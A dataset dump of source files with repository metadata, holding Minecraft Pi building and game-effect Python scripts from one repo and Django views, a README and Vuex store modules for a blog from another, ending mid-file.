5\n    x2 = posx + 5\n    x3 = posx\n    if direction == \"E\" or direction == \"W\":\n        z1 = posz - 5\n        z2 = posz + 5\n        z3 = posz\n        x1 = posx\n        x2 = posx\n        x3 = posx\n    mc.setBlocks(x1, posy, z1, x1, posy + 1, z1, block.GLASS_PANE.id)\n    mc.setBlocks(x2, posy, z2, x2, posy + 1, z2, block.GLASS_PANE.id)\n    mc.setBlocks(x3, posy, z3, x3, posy + 1, z3, block.GLASS_PANE.id)\n    if direction == \"N\":\n        a = 3\n    if direction == \"S\":\n        a = 2\n    if direction == \"W\":\n        a = 0\n    if direction == \"E\":\n        a = 1\n    mc.setBlock(x1, posy - 1, z1, 109, a)\n    mc.setBlock(x2, posy - 1, z2, 109, a)\n    mc.setBlock(x3, posy - 1, z3, 109, a)\n\n\ndef create_castle(mc, posx, posy, posz, size=10):\n    \"\"\"\n    Creates the castle in the sky, uses the initial positions and size to determine all other values\n    :param mc: minecraft client\n    :param size: How big the keep is, affects the island, walls and moat as a result\n    :param posx: where the x center should start\n    :param posy: where the y should start, castle then moves up 10 spaces\n    :param posz: where the z center should start\n    \"\"\"\n    # first create landscape\n    # posy = posy+10\n    mc.postToChat(\"Creating Landscape\")\n    create_landscape(mc, posx, posy, posz, size)\n    # next create walls\n    mc.postToChat(\"Creating border walls\")\n    create_walls(mc, posx, posy, posz, size * 2, 6)\n    mc.postToChat(\"Creating Keep\")\n    create_keep(mc, posx, posy, posz, size, 5)\n\n\nif __name__ == '__main__':\n    minecraft_client = Minecraft.create(sys.argv[1])\n    pos = minecraft_client.player.getPos()\n    if len(sys.argv) > 2:\n        positions = sys.argv[2].split(',')\n        pos_x = int(positions[0])  # use the x,y,z passed on the command line\n        pos_y = int(positions[1])\n        pos_z = int(positions[2])\n    else:\n        pos_x = int(pos.x)\n        pos_y = int(pos.y)\n        pos_z = int(pos.z)\n    create_castle(minecraft_client, pos_x, pos_y, pos_z)\n# --------------------------------------\n#\n# Main Script\n#\n# --------------------------------------\n# pos = mc.player.getPos()\n# x = pos.x\n# y = pos.y\n# z = pos.z\n#\n# print(\"Create ground and moat\")\n# # create_landscape(33, 10, 23)\n#\n# print(\"Create outer walls\")\n# create_walls(x, y, z, 21, 5, block.STONE_BRICK, True, True)\n#\n# print(\"Create inner walls\")\n# create_walls(x, y, z, 13, 6, block.STONE_BRICK, True, True)\n#\n# print(\"Create Keep with 4 levels\")\n# create_keep(x, y, z, 5, 4)\n#\n# print(\"Position player on Keep's walkway\")\n" }, { "alpha_fraction": 0.5329670310020447, "alphanum_fraction": 0.5700549483299255, "avg_line_length": 29.33333396911621, "blob_id": "89779e1aa3033188b08dd795eb40ef1d2dc31684", "content_id": "d8c5b520a43ea372b60c43f60473eb59eaee020c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 728, "license_type": "no_license", "max_line_length": 79, "num_lines": 24, "path": "/builds/rainbow.py", "repo_name": "Cody-Coleman/minecraft-scripts", "src_encoding": "UTF-8", "text": "import math\nimport time\nimport mcpi.block as block\n\nrainbow = [14, 1, 4, 13, 11, 10, 2]\n\n\ndef create_rainbow(mc, pos, radius=30):\n    \"\"\"\n    Creates a rainbow in the sky, handy when trying to mark spots\n    :param mc: Minecraft client\n    :param pos: position to start at, +3 for x, and z so it's not on top of you\n    :param radius: how round to make the rainbow\n    \"\"\"\n    x = int(pos.x) + 3\n    y = int(pos.y)\n    z = int(pos.z) + 3\n\n    for angle in range(360):\n        for i in range(len(rainbow)):\n            j = x + (radius - i) * math.cos(angle * math.pi / 180)\n            k = y + (radius - i) * math.sin(angle * math.pi / 180)\n            mc.setBlock(j, k, z, block.WOOL.id, rainbow[i])\n        time.sleep(0.1)\n" }, { 
"alpha_fraction": 0.521449863910675, "alphanum_fraction": 0.5437026619911194, "avg_line_length": 35.0247917175293, "blob_id": "cd90d2479643f380ef5747f3218f56329115998c", "content_id": "6483c49f4247b76674f517696173301d385909af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4359, "license_type": "no_license", "max_line_length": 107, "num_lines": 121, "path": "/builds/record_player.py", "repo_name": "Cody-Coleman/minecraft-scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nfrom mcpi.minecraft import Minecraft, Vec3\nfrom mcpi import block\nfrom time import sleep\nfrom threading import Thread\nimport subprocess\nimport sys\n\n\ndef matchVec3(vec1, vec2):\n if int(vec1.x) == int(vec2.x) and int(vec1.y) == int(vec2.y) and int(vec1.z) == int(vec2.z):\n return True\n else:\n return False\n\n\nclass RecordPlayer():\n def __init__(self, x, y, z):\n # Thread.__init__(self)\n self.running = True\n self.x = x\n self.y = y\n self.z = z\n self.running = True\n self.t1 = None\n self.proc = None\n # PERHAPS BUILD THE RECORD PLAYER IN THE INIT\n\n def on(self):\n self.running = True\n if self.proc is None:\n self.proc = subprocess.Popen(['pianobar'], stdout=subprocess.PIPE, shell=True)\n else:\n proc = subprocess.Popen(\"echo ' ' > ~/.config/pianobar/ctl\", shell=True, stdin=subprocess.PIPE,\n stdout=subprocess.PIPE)\n self.t1 = Thread(target=self.lights)\n self.t1.setDaemon(True)\n self.t1.start()\n\n def lights(self):\n while self.running == True:\n # START UP PANDORA\n mc.setBlock(self.x + 2, self.y + 1, self.z + 2, block.NETHER_REACTOR_CORE.id, 1)\n mc.setBlock(self.x - 1, self.y + 1, self.z + 2, block.NETHER_REACTOR_CORE.id, 1)\n sleep(0.25)\n mc.setBlock(self.x + 2, self.y + 1, self.z + 2, block.NETHER_REACTOR_CORE.id, 2)\n mc.setBlock(self.x - 1, self.y + 1, self.z + 2, block.NETHER_REACTOR_CORE.id, 2)\n sleep(0.25)\n\n def off(self):\n self.running = False\n # STOP PANDORA\n print(\"Got stop command\")\n if self.proc is not None:\n print(\"proc is not None\")\n proc = subprocess.Popen(\"echo ' ' > ~/.config/pianobar/ctl\", shell=True, stdin=subprocess.PIPE,\n stdout=subprocess.PIPE)\n mc.setBlock(self.x + 2, self.y + 1, self.z + 2, block.NETHER_REACTOR_CORE.id, 2)\n mc.setBlock(self.x - 1, self.y + 1, self.z + 2, block.NETHER_REACTOR_CORE.id, 2)\n\n def next(self):\n # SKIP SONG\n if self.proc is not None:\n proc = subprocess.Popen(\"echo 'n' > ~/.config/pianobar/ctl\", shell=True, stdin=subprocess.PIPE,\n stdout=subprocess.PIPE)\n\n def check_player(self, hit_list):\n for hit in hit_list:\n if matchVec3(hit.pos, Vec3(self.x, self.y + 1, self.z + 2)):\n block_data = mc.getBlockWithData(hit.pos)\n if block_data.id == 96 and block_data.data == 7:\n mc.postToChat(\"stopping record player\")\n self.off()\n break\n elif block_data.id == 96 and block_data.data == 3:\n mc.postToChat(\"starting record player\")\n self.on()\n break\n elif matchVec3(hit.pos, Vec3(self.x + 1, self.y, self.z + 2)):\n block_data = mc.getBlockWithData(hit.pos)\n if block_data.id == 47:\n mc.postToChat(\"changing song\")\n self.next()\n break\n\n def quit_player(self):\n print(\"Got quit command\")\n proc = subprocess.Popen(\"echo 'q' > ~/.config/pianobar/ctl\", shell=True, stdin=subprocess.PIPE,\n stdout=subprocess.PIPE)\n\n#\n# # GET INITIAL POSITIONS AND CONNECTIONS\n# mc = Minecraft.create()\n# pos = mc.player.getPos()\n# x, y, z = int(pos.x), int(pos.y), int(pos.z)\n#\n# # CREATE RECORD PLAYER\n# mc.setBlock(x, y, z + 2, block.CRAFTING_TABLE.id)\n# 
mc.setBlock(x, y + 1, z + 2, 96, 7)\n# # REMEMBER THE LIDS LOCATION\n# lid = Vec3(x, y + 1, z + 2)\n#\n# mc.setBlock(x - 1, y, z + 2, 49)\n# mc.setBlock(x - 1, y + 1, z + 2, block.NETHER_REACTOR_CORE.id, 2)\n# mc.setBlock(x + 1, y, z + 2, 47)\n# mc.setBlock(x + 2, y, z + 2, 49)\n# mc.setBlock(x + 2, y + 1, z + 2, block.NETHER_REACTOR_CORE.id, 2)\n# mc.setBlock(x - 1, y + 2, z + 2, block.OBSIDIAN.id)\n# mc.setBlock(x + 2, y + 2, z + 2, block.OBSIDIAN.id)\n#\n# record = recordPlayer(x, y, z)\n# hd = hitDetector()\n# hd.add_check(record.check_player)\n# hd.check_on()\n#\n# while True:\n# try:\n# sleep(1)\n# except KeyboardInterrupt:\n# record.quit_player()\n# sys.exit()\n" }, { "alpha_fraction": 0.5952000021934509, "alphanum_fraction": 0.6058666706085205, "avg_line_length": 41.6136360168457, "blob_id": "65a9f2e95b031d1270ae674cbd6b7b936ef9a193", "content_id": "a08e2dc449cfceac76192ed9b9df1a471c646c1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1875, "license_type": "no_license", "max_line_length": 100, "num_lines": 44, "path": "/builds/pyramid.py", "repo_name": "Cody-Coleman/minecraft-scripts", "src_encoding": "UTF-8", "text": "import math\nfrom mcpi import block\n\n\ndef create_pyramid(mc, posx, posy, posz, width, base=block.COBBLESTONE.id, walls=block.SANDSTONE.id,\n top_block=block.GOLD_BLOCK.id):\n \"\"\"\n Creates a pyramid at the posx, posy and posz coordinates with a width and height\n :param mc: Minecraft Client\n :param posx: The starting X coordinate\n :param posy: The starting Y coordinate\n :param posz: The starting Z coordinate\n :param width: How wide the base of the pyramid is\n :param base: what type of block the base of the pyramid is\n :param walls: what type of block the walls of the pyramid is\n :param top_block: what type of block goes on the very top of the pyramid\n \"\"\"\n mc.postToChat(\"About to create pyramid!\")\n # May sure width is odd number so pyramid ends\n # with a single block\n if width % 2 == 0:\n width = width + 1\n height = int((width + 1) / 2)\n half_size = int(math.floor(width / 2))\n mc.postToChat(f\"Player : {posx} {posy} {posz}\")\n mc.postToChat(f\"Size : {width} Height : {height} Halfsize : {half_size}\")\n # Create base for pyramid\n print(\"Create solid base\")\n mc.setBlocks(posx - half_size - 2, posy - 2, posz - half_size - 2,\n posx + half_size + 2, posy - 2, posz + half_size + 2,\n block.DIRT.id)\n mc.setBlocks(posx - half_size - 2, posy - 1, posz - half_size - 2,\n posx + half_size + 2, posy - 1, posz + half_size + 2,\n base)\n # Create solid Pyramid\n print(\"Create Pyramid\")\n for i in range(posy, posy + height):\n mc.setBlocks(posx - half_size, i, posz - half_size,\n posx + half_size, i, posz + half_size,\n walls)\n half_size = half_size - 1\n # Change top block\n print(\"Set top block\")\n mc.setBlock(posx, posy + height - 1, posz, top_block)\n" }, { "alpha_fraction": 0.5053003430366516, "alphanum_fraction": 0.5242531299591064, "avg_line_length": 37.432098388671875, "blob_id": "0e2e0a6beb00f02542e32c95eb8e8ea2e08de393", "content_id": "f63f59c4625db9ed5a1bb79e009e70f30ae83986", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3113, "license_type": "no_license", "max_line_length": 118, "num_lines": 81, "path": "/builds/magic_carpet.py", "repo_name": "Cody-Coleman/minecraft-scripts", "src_encoding": "UTF-8", "text": "#! 
/usr/bin/env python3\nfrom mcpi.minecraft import Minecraft, Vec3\nfrom threading import Thread\nimport mcpi.block as block\nimport time\n\n\nclass MagicCarpet:\n def __init__(self):\n \"\"\"\n initilize the carpet\n \"\"\"\n self.mc = Minecraft.create()\n self.mc.postToChat(\"Magic Carpet Activated\")\n self.block_list = []\n self.last_player_pos = self.mc.player.getPos()\n self.player_pos = Vec3(0, 0, 0)\n self.running = True\n self.t1 = None\n\n def match(self):\n return int(self.last_player_pos.x) == int(self.player_pos.x) \\\n and int(self.last_player_pos.y) == int(self.player_pos.y) \\\n and int(self.last_player_pos.z) == int(self.player_pos.z)\n\n def get_block_below(self, next_player_pos):\n block_below = Vec3(int(next_player_pos.x), int(next_player_pos.y), int(next_player_pos.z))\n if block_below.z < 0:\n block_below.z -= 1\n if block_below.x < 0:\n block_below.x -= 1\n block_below.y -= 1\n return block_below\n\n def start_carpet(self):\n self.running = True\n self.t1 = Thread(target=self.flying_carpet)\n self.t1.setDaemon(True)\n self.t1.start()\n\n def check_carpet(self, hit_list):\n for hit in hit_list:\n if self.mc.getBlock(hit.pos) == block.WOOL.id and len(self.block_list) > 0:\n # print(\"Checking on the carpet\")\n for carpet in self.block_list:\n # print(\"Cleaning up Carpet\")\n self.mc.setBlocks(carpet - Vec3(1, 0, 1), carpet + Vec3(1, 0, 2), block.AIR)\n time.sleep(2)\n break\n\n def flying_carpet(self):\n \"\"\"\n put a carpet under you\n :return:\n \"\"\"\n while self.running:\n self.player_pos = self.mc.player.getPos()\n mov_x = self.last_player_pos.x - self.player_pos.x\n mov_z = self.last_player_pos.z - self.player_pos.z\n if mov_x < -0.2 or mov_x > 0.2 or mov_z < -0.2 or mov_z > 0.2:\n # DETECTED HORIZONTAL MOVEMENT\n next_player_pos = self.player_pos\n while self.match():\n next_player_pos = Vec3(next_player_pos.x - mov_x,\n next_player_pos.y, next_player_pos.z - mov_z)\n block_below = self.get_block_below(next_player_pos)\n if self.mc.getBlock(block_below) == block.AIR.id:\n self.mc.setBlocks(block_below - Vec3(1, 0, 1), block_below + Vec3(1, 0, 2), 35, 10)\n self.block_list.append(block_below)\n if len(self.block_list) > 2:\n block_cleanup = self.block_list.pop(0)\n self.mc.setBlocks(block_cleanup - Vec3(1, 0, 1), block_cleanup + Vec3(1, 0, 2), block.AIR)\n self.last_player_pos = self.player_pos\n time.sleep(0.2)\n\n def stop_carpet(self):\n \"\"\"\n remove the carpet\n :return:\n \"\"\"\n self.running = False\n" }, { "alpha_fraction": 0.5566571950912476, "alphanum_fraction": 0.580736517906189, "avg_line_length": 27.239999771118164, "blob_id": "f75d7f89132b5969e6b527f8252a8a0e0d336c5e", "content_id": "f8f49083166f8fc7bdfdfdb261f22b3448c5a874", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 706, "license_type": "no_license", "max_line_length": 88, "num_lines": 25, "path": "/detectors/sreact_detector.py", "repo_name": "Cody-Coleman/minecraft-scripts", "src_encoding": "UTF-8", "text": "#! 
/usr/bin/env python3\n\nimport sys\nimport RPi.GPIO as GPIO\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\n\nplayer_dict = {'waffleman1793': 13, 'kid_gamer_888': 6, 'jojo_pie': 5, 'yaboidatboi': 6}\naction_dict = {'joined': GPIO.HIGH, 'left': GPIO.LOW}\n\nif __name__ == '__main__':\n try:\n player_name = sys.argv[1].lower()\n if player_name in player_dict:\n pin = player_dict[player_name]\n else:\n pin = 22\n action = action_dict[sys.argv[2]]\n print(\"Player: {}\\tPin: {}\\tAction: {}\".format(player_name, pin, action))\n GPIO.setup(pin, GPIO.OUT)\n GPIO.output(pin, action)\n except Exception as e:\n print(e)\n GPIO.cleanup()\n" }, { "alpha_fraction": 0.5770684480667114, "alphanum_fraction": 0.6014279723167419, "avg_line_length": 30.328947067260742, "blob_id": "6375edebe31ab617ff5660ca03371692c72324a7", "content_id": "10832d864d04e0f21cb582b5af1bca6755d30570", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2381, "license_type": "no_license", "max_line_length": 93, "num_lines": 76, "path": "/launch_hacks.py", "repo_name": "Cody-Coleman/minecraft-scripts", "src_encoding": "UTF-8", "text": "import sys\nimport random\nimport time\nfrom detectors.hit_detector import HitDetector\nfrom swords.swords import Sword\n\n\ndef type_output(sentence, speed=80):\n for letter in sentence:\n sys.stdout.write(letter)\n sys.stdout.flush()\n time.sleep(random.random() * 10.0 / (speed + 10))\n print(\"\\n\")\n\n\nif __name__ == '__main__':\n sword = Sword()\n hd = HitDetector()\n hd.add_check(sword.check_sword)\n sword_selection = {'1': 'normal', '2': 'lava', '3': 'water', '4': 'ice', '5': 'air'}\n sword.enable_sword()\n hd.check_on()\n while True:\n print(\"\\033c\")\n type_output(\"Welcome to the Minecraft Sword Arsenal selection screen\")\n type_output(\"Select your sword type from below\")\n type_output(\"1.) Normal Sword -> No special effects\")\n type_output(\"2.) Lava Sword -> Change blocks to flowing Lava\")\n type_output(\"3.) Water Sword -> Change blocks into flowing water\")\n type_output(\"4.) Ice Sword -> Change blocks into Ice\")\n type_output(\"5.) 
Air Sword -> Float Blocks\")\n sword_input = input(\"Select your Sword [1-5]: \")\n if sword_input not in sword_selection:\n pass\n else:\n type_output(\"You've selected {} sword type\".format(sword_selection[sword_input]))\n sword.set_sword_type(sword_selection[sword_input])\n\n\n# sword = air_sword()\n# sword.enable_sword()\n# hd = hitDetector()\n# hd.add_check(sword.check_air_sword)\n# hd.check_on()\n\n\n# # GET INITIAL POSITIONS AND CONNECTIONS\n# mc = Minecraft.create()\n# pos = mc.player.getPos()\n# x, y, z = int(pos.x), int(pos.y), int(pos.z)\n#\n# # CREATE RECORD PLAYER\n# mc.setBlock(x, y, z + 2, block.CRAFTING_TABLE.id)\n# mc.setBlock(x, y + 1, z + 2, 96, 7)\n# # REMEMBER THE LIDS LOCATION\n# lid = Vec3(x, y + 1, z + 2)\n#\n# mc.setBlock(x - 1, y, z + 2, 49)\n# mc.setBlock(x - 1, y + 1, z + 2, block.NETHER_REACTOR_CORE.id, 2)\n# mc.setBlock(x + 1, y, z + 2, 47)\n# mc.setBlock(x + 2, y, z + 2, 49)\n# mc.setBlock(x + 2, y + 1, z + 2, block.NETHER_REACTOR_CORE.id, 2)\n# mc.setBlock(x - 1, y + 2, z + 2, block.OBSIDIAN.id)\n# mc.setBlock(x + 2, y + 2, z + 2, block.OBSIDIAN.id)\n#\n# record = recordPlayer(x, y, z)\n# hd = hitDetector()\n# hd.add_check(record.check_player)\n# hd.check_on()\n#\n# while True:\n# try:\n# sleep(1)\n# except KeyboardInterrupt:\n# record.quit_player()\n# sys.exit()\n" }, { "alpha_fraction": 0.5438057780265808, "alphanum_fraction": 0.5535714030265808, "avg_line_length": 41.66666793823242, "blob_id": "9c9c61650e68ed56f29a5f06d1173665e9c7e501", "content_id": "a954dfa93f0a45fdf6c903fdf66a6debc87f3c88", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3584, "license_type": "no_license", "max_line_length": 121, "num_lines": 84, "path": "/swords/swords.py", "repo_name": "Cody-Coleman/minecraft-scripts", "src_encoding": "UTF-8", "text": "from mcpi.minecraft import Minecraft, Vec3\nfrom time import sleep\nfrom threading import Thread\n\n\nclass Sword:\n def __init__(self, address=\"localhost\", port=4711):\n self.mc = Minecraft.create(address, port)\n self.enable = False\n # Sword Types: 0 == Normal, 10 == Lava, 8 == Water, 79 == ice,\n self.sword_type = 'normal'\n\n def enable_sword(self):\n self.enable = True\n self.mc.events.clearAll()\n\n def disable_sword(self):\n self.enable = False\n\n def set_sword_type(self, sword_type):\n self.sword_type = sword_type\n\n def check_sword(self, hit_list):\n if self.enable:\n if self.sword_type == 'air':\n self.check_air_sword(hit_list)\n else:\n for hit in hit_list:\n hit_block_pos = hit.pos\n if self.sword_type == 'normal':\n pass\n elif self.sword_type == 'lava':\n self.mc.setBlock(hit_block_pos, 10)\n elif self.sword_type == 'water':\n self.mc.setBlock(hit_block_pos, 8)\n elif self.sword_type == 'ice':\n self.mc.setBlock(hit_block_pos, 79)\n\n def check_air_sword(self, hit_list):\n \"\"\"\n Checks the hit_list to see if it matches a block that is not air, and has nothing above it. 
If so will\n        spin up a new thread to start that block floating up in the float_block function\n        :param hit_list: a mcpi list of block hit data\n        \"\"\"\n        if self.enable:\n            for hit in hit_list:\n                hit_block_data = self.mc.getBlockWithData(hit.pos)\n                hit_block_pos = hit.pos\n                next_block_pos = Vec3(hit.pos.x, hit.pos.y + 1, hit.pos.z)\n                next_block_data = self.mc.getBlockWithData(next_block_pos)\n                if hit_block_data.id != 0 and next_block_data.id == 0:\n                    # self.mc.postToChat(\"Block found floating now\")\n                    t1 = Thread(target=self.float_block,\n                                args=(hit_block_pos, hit_block_data))\n                    t1.setDaemon(True)\n                    t1.start()\n                    break\n\n    def float_block(self, hit_block_pos, hit_block_data):\n        \"\"\"\n        Rotates between the hit block and the one above it: sets the block above to the hit block's type,\n        sets the hit block to air, then shifts the tracked position up by one, looping 10 times\n        :param hit_block_pos: The position of the hit block\n        :param hit_block_data: The data of the hit block, used to set the air block above hit block to this\n        :return:\n        \"\"\"\n        # self.mc.postToChat(\"Block found floating now\")\n        for _ in range(10):  # ten steps up, matching the docstring\n            next_block_pos = Vec3(hit_block_pos.x, hit_block_pos.y+1, hit_block_pos.z)\n            # self.mc.postToChat(\"hit_block: {}\\nnext_block: {}\".format(hit_block_data.id, next_block_data.id))\n            # Sets current block to Air\n            self.mc.setBlock(hit_block_pos, 0)\n            # Sets block above to the same type as the block that was hit\n            self.mc.setBlock(next_block_pos, hit_block_data.id, 0)\n            # sets the hit_block to the next_block position, and next block to one spot higher\n            hit_block_pos = Vec3(next_block_pos.x, next_block_pos.y, next_block_pos.z)\n            sleep(0.5)\n\n    def __del__(self):\n        \"\"\"\n        Disable the sword / clean up any threads\n        :return:\n        \"\"\"\n        self.disable_sword()\n" } ]
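# A usage sketch for detectors/hit_detector.py above: a check is any callable
# that accepts the polled list of mcpi block-hit events, exactly as
# launch_hacks.py wires Sword.check_sword in. Checks have to be registered
# while the detector is stopped, because add_check refuses changes once the
# polling thread is live. announce_hits is a hypothetical example check.
from mcpi.minecraft import Minecraft
from detectors.hit_detector import HitDetector

mc = Minecraft.create()

def announce_hits(hit_list):
    # Post each sword hit back to chat with its block coordinates.
    for hit in hit_list:
        mc.postToChat("Block hit at {} {} {}".format(int(hit.pos.x), int(hit.pos.y), int(hit.pos.z)))

detector = HitDetector()
detector.add_check(announce_hits)
detector.check_on()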
9
pyramidk/blog
https://github.com/pyramidk/blog
6d10a04cebea585a9a33f77ddcad39fd09e0910c
d1f86384d77919347c436cb1e9cc921e766075fe
cd0f321dc579f33c298601d53b23269ab58f1611
refs/heads/master
2020-03-07T00:30:33.939716
2018-07-10T08:14:48
2018-07-10T08:14:48
126,995,782
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7371428608894348, "alphanum_fraction": 0.7485714554786682, "avg_line_length": 15.4375, "blob_id": "7561ef238c0535cae9e51d623a0f730bcd989697", "content_id": "e31d1f9b198ed9da9e3446bc4bda7e5eac478a8e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 525, "license_type": "no_license", "max_line_length": 58, "num_lines": 32, "path": "/README.md", "repo_name": "pyramidk/blog", "src_encoding": "UTF-8", "text": "# Pyramid-Blog\n\n> A blog created by python, django and vue.\n\n## Usage\n\nAbout the server\n\n``` bash\npython manage.py runserver\n```\n\nAbout the frontend\n\n``` bash\n# install dependencies\nyarn or npm install\n\n# serve with hot reload at localhost:8080\nyarn dev or npm run dev\n\n# build for production with minification\nnpm run build\n\n# build for production and view the bundle analyzer report\nnpm run build --report\n```\n\n## Screenshot\n![](blogproject/frontend/static/screenshot1.png)\n\n![](blogproject/frontend/static/screenshot2.png)" }, { "alpha_fraction": 0.6903515458106995, "alphanum_fraction": 0.6903515458106995, "avg_line_length": 31.609756469726562, "blob_id": "c849cdeaf92086f24ac36e3962fdf2f901a6631a", "content_id": "ba616b7a0d9d3545dd1fc727b5efe179306c300a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1337, "license_type": "no_license", "max_line_length": 77, "num_lines": 41, "path": "/blogproject/blog/views.py", "repo_name": "pyramidk/blog", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom django.http import HttpResponse, JsonResponse\n\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom rest_framework import status\n\nfrom .serializers import PostSerializers, CategorySerializers, TagSerializers\nfrom .models import Post, Category, Tag\n\n# Create your views here.\n@api_view(['GET'])\ndef index (request):\n if request.method == 'GET':\n post = Post.objects.all().order_by('-created_time')\n serializer = PostSerializers(post, many=True)\n # for non\n return JsonResponse(serializer.data, safe=False)\n\n@api_view(['GET'])\ndef category (request):\n if request.method == 'GET':\n category = Category.objects.all()\n serializer = CategorySerializers(category, many=True)\n print(serializer.data)\n return JsonResponse(serializer.data, safe=False)\n\n@api_view(['GET'])\ndef tag (request):\n if request.method == 'GET':\n tag = Tag.objects.all()\n serializer = TagSerializers(tag, many=True)\n print(serializer.data)\n return JsonResponse(serializer.data, safe=False)\n\n@api_view(['GET'])\ndef detail (request, pk):\n if request.method == 'GET':\n post = Post.objects.get(pk=pk)\n serializer = PostSerializers(post)\n return JsonResponse(serializer.data)\n" }, { "alpha_fraction": 0.7510373592376709, "alphanum_fraction": 0.7510373592376709, "avg_line_length": 47.20000076293945, "blob_id": "ba0c0f24e5cc9036106964ab022e3a1bb113f7c6", "content_id": "555003dc3f23f35ada40cbf4b631466313c98c42", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 241, "license_type": "no_license", "max_line_length": 58, "num_lines": 5, "path": "/blogproject/frontend/src/store/action-types.js", "repo_name": "pyramidk/blog", "src_encoding": "UTF-8", "text": "export const GET_BLOG_LIST = 'GET_BLOG_LIST'\nexport const GET_BLOG = 'GET_BLOG'\nexport const GET_BLOG_TAGS = 'GET_BLOG_TAGS'\nexport const GET_BLOG_CATEGORIES = 
'GET_BLOG_CATEGORIES'\nexport const GET_ALL_CONTENT_DATA = 'GET_ALL_CONTENT_DATA'\n" }, { "alpha_fraction": 0.7554585337638855, "alphanum_fraction": 0.7554585337638855, "avg_line_length": 44.79999923706055, "blob_id": "ef9ec56ce1a25b90065edb55ef32356e2a31e824", "content_id": "207b27c55b9e6860eecc716addd1ea1c990abfc5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 229, "license_type": "no_license", "max_line_length": 56, "num_lines": 5, "path": "/blogproject/frontend/src/store/mutation-types.js", "repo_name": "pyramidk/blog", "src_encoding": "UTF-8", "text": "export const SET_BLOGS = 'SET_BLOGS'\nexport const SET_BLOG_DETAIL = 'SET_BLOG_DETAIL'\nexport const SET_BLOG_TAGS = 'SET_BLOG_TAGS'\nexport const SET_BLOG_CATEGORIES = 'SET_BLOG_CATEGORIES'\nexport const SET_LOADING = 'SET_LOADING'\n" }, { "alpha_fraction": 0.6725663542747498, "alphanum_fraction": 0.6725663542747498, "avg_line_length": 15.142857551574707, "blob_id": "0f17cb5cfd163c4ceff3e7e12d31040ad3220761", "content_id": "f68fe6e28db7be596ed78586fe7e257eb1122e11", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 226, "license_type": "no_license", "max_line_length": 51, "num_lines": 14, "path": "/blogproject/frontend/src/store/index.js", "repo_name": "pyramidk/blog", "src_encoding": "UTF-8", "text": "import Vue from 'vue'\nimport Vuex from 'vuex'\nimport blog from './module/blog'\n\nVue.use(Vuex)\n\nconst debug = process.env.NODE_ENV !== 'production'\n\nexport default new Vuex.Store({\n modules: {\n blog\n },\n strict: debug\n})\n" }, { "alpha_fraction": 0.5482176542282104, "alphanum_fraction": 0.5530956983566284, "avg_line_length": 23.675926208496094, "blob_id": "c84f37cb231583bebf05be87ac331f46b7447b2b", "content_id": "8163512ea93904982f49359c798c1e39d75c2040", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2665, "license_type": "no_license", "max_line_length": 68, "num_lines": 108, "path": "/blogproject/frontend/src/store/module/blog.js", "repo_name": "pyramidk/blog", "src_encoding": "UTF-8", "text": "import axios from 'axios'\nimport * as aTypes from '@/store/action-types'\nimport * as mTypes from '@/store/mutation-types'\n\nconst state = {\n data: 'store data',\n blogs: [],\n tags: [],\n categories: [],\n blogData: {},\n loading: true\n}\n\nconst actions = {\n [aTypes.GET_BLOG_LIST] ({ commit }) {\n return new Promise(async (resolve, reject) => {\n try {\n const res = await axios.get('/api/list/')\n if (res.status !== 200) return\n commit(mTypes.SET_BLOGS, { blogs: res.data })\n resolve()\n } catch (err) {\n reject(err)\n } finally {\n }\n })\n },\n [aTypes.GET_BLOG] ({ commit }, { blogId }) {\n return new Promise(async (resolve, reject) => {\n try {\n const res = await axios.get(`/api/list/${blogId}`)\n if (res.status !== 200) return\n commit(mTypes.SET_BLOG_DETAIL, { data: res.data })\n resolve()\n } catch (err) {\n reject(err)\n } finally {\n }\n })\n /* axios.get('/api/list/4').then(res => {\n console.log(res)\n commit(mTypes.SET_BLOG_DETAIL, { res })\n }) */\n },\n [aTypes.GET_BLOG_TAGS] ({ commit }) {\n return new Promise(async (resolve, reject) => {\n try {\n const res = await axios.get(`/api/tags`)\n if (res.status !== 200) return\n commit(mTypes.SET_BLOG_TAGS, { tags: res.data })\n resolve()\n } catch (err) {\n reject(err)\n } finally {\n }\n })\n },\n [aTypes.GET_BLOG_CATEGORIES] ({ commit }) {\n return new Promise(async (resolve, 
reject) => {\n try {\n const res = await axios.get(`/api/categories`)\n if (res.status !== 200) return\n commit(mTypes.SET_BLOG_CATEGORIES, { categories: res.data })\n resolve()\n } catch (err) {\n reject(err)\n } finally {\n }\n })\n },\n [aTypes.GET_ALL_CONTENT_DATA] ({ commit, dispatch }) {\n const tagPromise = dispatch(aTypes.GET_BLOG_TAGS)\n const catPromise = dispatch(aTypes.GET_BLOG_CATEGORIES)\n const blogPromise = dispatch(aTypes.GET_BLOG_LIST)\n\n Promise.all([\n tagPromise,\n catPromise,\n blogPromise\n ]).then(() => {\n commit(mTypes.SET_LOADING, { loading: true })\n })\n }\n}\n\nconst mutations = {\n [mTypes.SET_BLOGS] (state, { blogs }) {\n state.blogs = blogs\n },\n [mTypes.SET_BLOG_DETAIL] (state, { data }) {\n state.blogData = data\n },\n [mTypes.SET_BLOG_TAGS] (state, { tags }) {\n state.tags = tags\n },\n [mTypes.SET_BLOG_CATEGORIES] (state, { categories }) {\n state.categories = categories\n },\n [mTypes.SET_LOADING] (state, { loading }) {\n state.loading = 